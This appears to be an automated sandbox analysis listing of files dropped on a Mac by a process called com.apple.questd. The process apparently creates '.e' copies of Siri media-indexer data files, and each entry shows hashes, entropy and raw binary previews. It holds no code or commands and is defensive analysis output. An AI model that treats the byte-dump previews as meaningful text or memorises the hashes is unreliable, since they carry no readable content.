                                                                                                    Preview: ..@.7R......#f.9sF...-O..........~.]"n....)B.?...\..W..*.4.....zo*..$y.0...~.H.}..z..+.."..SwM.A....<|B1...X7..d.......R.....0.....3....9.[}.,YE..z..V..R.u.Y[.......o..E.Y..8..w...M..2.8xYO.......+..e~C]K.Rw.......xq....+..e....+..e..4;...P..v...@.....+..e....1..G.]....3..;Co.,..@X..3.(.F......l..0....4l2.^1..... ..0J.....8/.%.K.y.^..\........K.U....#Pef...fv......$....+..e....1..G`.....*y..^...".....v_z.+....y.........Is['..7....J Sr~.O.....y...'.....{.4....C;...^...$.Z.......Z.1^8k.. ]1W......._W.j.P.P=+G...^...!...#+vY.|STXV..l..ks7..o..0.....O..r...;.@7...a....#+vY.C.f....X..y.q.u@H.~PW#^7.c..E..&..4.N............Z.!..i..C1.W.\.....~G0PS..B...5.$....$.E^ue...8+.UmO..%"........bsb_...w.B..Z..l._.b..lsA..i...i......i.....R..W....F]..a..gZ...J..a..<!d.@'.U?.a..gZ...].>(.N..\%...A].a..gZ.....V`.+E....#)F....Z...J.L...d.[XC.).%..<'X.iXY@V.......}....S.....p.....a........o..^+)7.h<.C....\....*(X'.c..!....|.. w..8.E6R......F....s~..b.dDL.i*.L.........!....I*..I.......Ut.x....A....}.......
                                                                                                    /Users/ben/Library/Containers/com.apple.siri.media-indexer/.Container.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):27843
                                                                                                    Entropy (8bit):7.959464577872068
                                                                                                    Encrypted:false
                                                                                                    MD5:A36C028E569966831367DC0356727C0F
                                                                                                    SHA1:263D945E03980C1D50F72850EDE344EF354EF1FC
                                                                                                    SHA-256:3023E85B823BA1B0ADBB147486ED639B4B2BEDD860517189E5A5F7E31011E692
                                                                                                    SHA-512:92FA7A055C5E4AF07DD827565282F7E58698DB0C6D2A1684E997CC3E70CF620552BC4D272926957C35FA16BCCB34192A05EEDFAE35D627CA4F87EDD295F07FE4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......#f.9sF...-O..........~.]"n....)B.?...\..W..*.4.....zo*..$y.0...~.H.}..z..+...)56..5oC.Uv......P|.....8.~.....*...`.u.CK..Gt......xin..I...[..T.7.+..nS..c..}s9[|..=..L...UU..|..5*Ac..5.....h..L..## ..e......5.......5..........ah.w....(....5......h../.b.1wh.<.U...T........}.......t.Y..a6s... ..k..KAL..lP.!...,.....(.Ee...._N.x..Ez.....@....!.X.t...9..!m .?..5......h../.b.1wh.<.U...A..)..m.W.Q........i.........:..t.j2...:.....J...\.}ya7..B..h.....V.E.........Lv..>HFp.)n,I........C..T....-q/...0.C..[...*.....F.....E.. .........C..:<g.....E...X......C`.......e ...a:K.[<.......U.N...d...L7.>u..*.1d..y\.....Cr..^..9S.$.".......e%j..... ...fwSD.$JC.).LK.....34r,C.Y.T5(G.29^b...uKg!I...g.|jS...e.<.....uKg!I.@*~.0:'..,.\.E3 ..uKg!I.\.MZBI.K..`}Y).SH{G..q.D.............V.....;Q+.).%.O......%......z........3.i.....l..U..|/.%9.......K..'.$..~p......|.. H..).}...9.;..."-...j....UA....,.Lk.....G.$<>iU..........B..[.....>..8......P...C2.........Wo......9.7.w..i...x...k.2.u....{.d.HY1.M~..B
                                                                                                    /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.albumartistnamesdataTable.tdb.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2362
                                                                                                    Entropy (8bit):3.706889593762588
                                                                                                    Encrypted:false
                                                                                                    MD5:550A1FB579D9E2D6D91E29C03C2A174B
                                                                                                    SHA1:B609011C4DCAF62735D6E9A9B755CF1A9E71746E
                                                                                                    SHA-256:5D39DAA33218AC934B02613D8317FEC3235F1EDA42A0D95A7A6899F7BD203657
                                                                                                    SHA-512:80E8880238830554624C87B071281D24F098E18E08694FFE1C8E9143AAFE35F4DE3664A3C7A5F70E55DF7BF26C229D5CD050F8D72E3D1C77E3B9FEC73CE9118A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o...
                                                                                                    /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.albumartistnamesedgeTable.tdb.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2362
                                                                                                    Entropy (8bit):3.702863440077437
                                                                                                    Encrypted:false
                                                                                                    MD5:035342ED3B456252D262803F434A4763
                                                                                                    SHA1:C4F54A0E05A3CC16E921EA269A1A827206EE36C2
                                                                                                    SHA-256:1FB7861514E38E939379EBA8DFEECE351605B5A6EBE9B0B210A1F778360F572A
                                                                                                    SHA-512:6F89A5EA512D771EAA8B71AEFEAD9532F95524640E7ADB097A3DADE652FA6BE3E4880DD65C1F432ECBE05121F22F851A53C19FF07243472BA369303086282367
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o...
                                                                                                    /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.albumartistnamesfinalTable.tdb.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2362
                                                                                                    Entropy (8bit):3.7077363338133917
                                                                                                    Encrypted:false
                                                                                                    MD5:4D440670569E33D27407856D961E3508
                                                                                                    SHA1:8C76DA79853361D6972B7ECFEF454FB792D21342
                                                                                                    SHA-256:6D961C4FDF29F96C79B100ECDBCB6E2DE21A6EEEB35625F26DF4CECE88F96D0F
                                                                                                    SHA-512:129F608974DE364FEEAB467D0C47DD4B4FB37FED50ED6FC167323310E79D842FFA7F37F860F0D4A4CD38E1C93275C37CCFA63AFB8D9B752CC0D16353A1DCBEAC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o...
                                                                                                    /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.albumtitlesdataTable.tdb.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2362
                                                                                                    Entropy (8bit):3.70636245045275
                                                                                                    Encrypted:false
                                                                                                    MD5:EFAE6ECA409685DD1C26BAFC6A947EB7
                                                                                                    SHA1:94C4064AB9E76A03A9690D70032EA139E0D5B039
                                                                                                    SHA-256:B9D9E2183C84A652C94672F9C27D25C5339A1D1EC05656ABFB144A1B62A8C9FB
                                                                                                    SHA-512:AD1EC1A646BEDED0EC6F345195A554D8B4D199CC6BDBE8D9C3F24D883D52F10916C7975D5936FD8A3847E033219C426B7B7F716FE4705220CF3EA51D8FDDFBDB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o...
                                                                                                    /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.albumtitlesedgeTable.tdb.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2362
                                                                                                    Entropy (8bit):3.706889593762588
                                                                                                    Encrypted:false
                                                                                                    MD5:550A1FB579D9E2D6D91E29C03C2A174B
                                                                                                    SHA1:B609011C4DCAF62735D6E9A9B755CF1A9E71746E
                                                                                                    SHA-256:5D39DAA33218AC934B02613D8317FEC3235F1EDA42A0D95A7A6899F7BD203657
                                                                                                    SHA-512:80E8880238830554624C87B071281D24F098E18E08694FFE1C8E9143AAFE35F4DE3664A3C7A5F70E55DF7BF26C229D5CD050F8D72E3D1C77E3B9FEC73CE9118A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o...
                                                                                                    /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.albumtitlesfinalTable.tdb.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2362
                                                                                                    Entropy (8bit):3.7077363338133917
                                                                                                    Encrypted:false
                                                                                                    MD5:4D440670569E33D27407856D961E3508
                                                                                                    SHA1:8C76DA79853361D6972B7ECFEF454FB792D21342
                                                                                                    SHA-256:6D961C4FDF29F96C79B100ECDBCB6E2DE21A6EEEB35625F26DF4CECE88F96D0F
                                                                                                    SHA-512:129F608974DE364FEEAB467D0C47DD4B4FB37FED50ED6FC167323310E79D842FFA7F37F860F0D4A4CD38E1C93275C37CCFA63AFB8D9B752CC0D16353A1DCBEAC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o...
                                                                                                    /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.artistnamesdataTable.tdb.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2362
                                                                                                    Entropy (8bit):3.7077363338133917
                                                                                                    Encrypted:false
                                                                                                    MD5:4D440670569E33D27407856D961E3508
                                                                                                    SHA1:8C76DA79853361D6972B7ECFEF454FB792D21342
                                                                                                    SHA-256:6D961C4FDF29F96C79B100ECDBCB6E2DE21A6EEEB35625F26DF4CECE88F96D0F
                                                                                                    SHA-512:129F608974DE364FEEAB467D0C47DD4B4FB37FED50ED6FC167323310E79D842FFA7F37F860F0D4A4CD38E1C93275C37CCFA63AFB8D9B752CC0D16353A1DCBEAC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o...
                                                                                                    /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.artistnamesedgeTable.tdb.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2362
                                                                                                    Entropy (8bit):3.7068895937625874
                                                                                                    Encrypted:false
                                                                                                    MD5:E3862DD21CAA40B4B95F89C1109DBA83
                                                                                                    SHA1:E31961B0E14AD02559EEB613E6584DE90EC8C0A0
                                                                                                    SHA-256:8ED8C30A6B5F8013DAE92736D22EE7391E7569E779C577E26E698AD02CBA70C4
                                                                                                    SHA-512:501F555A423567E5D4FC75CF7A8F4BC8392BD13385F9CA5FF2C99E7BB9CDC1DD97B3CDBF44EB195DCBD7CB08872A6D2E521E9BBCCA3DD7459477C267B915DC07
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o...
                                                                                                    /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.artistnamesfinalTable.tdb.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2362
                                                                                                    Entropy (8bit):3.7068895937625874
                                                                                                    Encrypted:false
                                                                                                    MD5:E3862DD21CAA40B4B95F89C1109DBA83
                                                                                                    SHA1:E31961B0E14AD02559EEB613E6584DE90EC8C0A0
                                                                                                    SHA-256:8ED8C30A6B5F8013DAE92736D22EE7391E7569E779C577E26E698AD02CBA70C4
                                                                                                    SHA-512:501F555A423567E5D4FC75CF7A8F4BC8392BD13385F9CA5FF2C99E7BB9CDC1DD97B3CDBF44EB195DCBD7CB08872A6D2E521E9BBCCA3DD7459477C267B915DC07
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o...
                                                                                                    /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.composernamesdataTable.tdb.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2362
                                                                                                    Entropy (8bit):3.706889593762588
                                                                                                    Encrypted:false
                                                                                                    MD5:550A1FB579D9E2D6D91E29C03C2A174B
                                                                                                    SHA1:B609011C4DCAF62735D6E9A9B755CF1A9E71746E
                                                                                                    SHA-256:5D39DAA33218AC934B02613D8317FEC3235F1EDA42A0D95A7A6899F7BD203657
                                                                                                    SHA-512:80E8880238830554624C87B071281D24F098E18E08694FFE1C8E9143AAFE35F4DE3664A3C7A5F70E55DF7BF26C229D5CD050F8D72E3D1C77E3B9FEC73CE9118A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o...
                                                                                                    /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.composernamesedgeTable.tdb.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2362
                                                                                                    Entropy (8bit):3.702863440077437
                                                                                                    Encrypted:false
                                                                                                    MD5:035342ED3B456252D262803F434A4763
                                                                                                    SHA1:C4F54A0E05A3CC16E921EA269A1A827206EE36C2
                                                                                                    SHA-256:1FB7861514E38E939379EBA8DFEECE351605B5A6EBE9B0B210A1F778360F572A
                                                                                                    SHA-512:6F89A5EA512D771EAA8B71AEFEAD9532F95524640E7ADB097A3DADE652FA6BE3E4880DD65C1F432ECBE05121F22F851A53C19FF07243472BA369303086282367
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o...
                                                                                                    /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.composernamesfinalTable.tdb.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2362
                                                                                                    Entropy (8bit):3.7077363338133917
                                                                                                    Encrypted:false
                                                                                                    MD5:4D440670569E33D27407856D961E3508
                                                                                                    SHA1:8C76DA79853361D6972B7ECFEF454FB792D21342
                                                                                                    SHA-256:6D961C4FDF29F96C79B100ECDBCB6E2DE21A6EEEB35625F26DF4CECE88F96D0F
                                                                                                    SHA-512:129F608974DE364FEEAB467D0C47DD4B4FB37FED50ED6FC167323310E79D842FFA7F37F860F0D4A4CD38E1C93275C37CCFA63AFB8D9B752CC0D16353A1DCBEAC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o...
                                                                                                    /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.genrenamesdataTable.tdb.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2362
                                                                                                    Entropy (8bit):3.7060428537117835
                                                                                                    Encrypted:false
                                                                                                    MD5:FA8A6204E3664A689E5E18C68739A41C
                                                                                                    SHA1:FE811473FCD17671B16824CC6B5EF1F419F5B52F
                                                                                                    SHA-256:7720FE043CC101DEB16E53F5E6C0B923999476BA8761DFD746BE91A75E254798
                                                                                                    SHA-512:70D959DE8D6606867825EF456B85644B0A103C7FB267637AB37AB35AD424EBCC895C9B99D43EA8FFCD6600C903FBF1671B0211C2F2BC7439A2AF85665F32749E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o...
                                                                                                    /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.genrenamesedgeTable.tdb.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2362
                                                                                                    Entropy (8bit):3.70636245045275
                                                                                                    Encrypted:false
                                                                                                    MD5:EFAE6ECA409685DD1C26BAFC6A947EB7
                                                                                                    SHA1:94C4064AB9E76A03A9690D70032EA139E0D5B039
                                                                                                    SHA-256:B9D9E2183C84A652C94672F9C27D25C5339A1D1EC05656ABFB144A1B62A8C9FB
                                                                                                    SHA-512:AD1EC1A646BEDED0EC6F345195A554D8B4D199CC6BDBE8D9C3F24D883D52F10916C7975D5936FD8A3847E033219C426B7B7F716FE4705220CF3EA51D8FDDFBDB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o......=.....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o....)..o...
                                                                                                    /Users/ben/Library/Containers/com.apple.siri.media-indexer/Data/.genrenamesfinalTable.tdb.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2362
                                                                                                    Entropy (8bit):3.70540366022985
                                                                                                    Encrypted:false
                                                                                                    MD5:EBB7A7A054827344701828BBE994A836
                                                                                                    SHA1:D4BEFA6B1440014A4F1B0B466333E1BAFCD5395E
                                                                                                    SHA-256:1B8C7D3252633EA2D23AC2F34826756A844A2C0C715C17E77FBBE2693EF45A93
                                                                                                    SHA-512:5F020E71AAC772D3B226613654852C399F530AB71A8F1C18FCB350DA7E202355C164DC52D3D1DC54105CE8DD37F4795AF449167356DBB3718BFB251BF7F4E88E
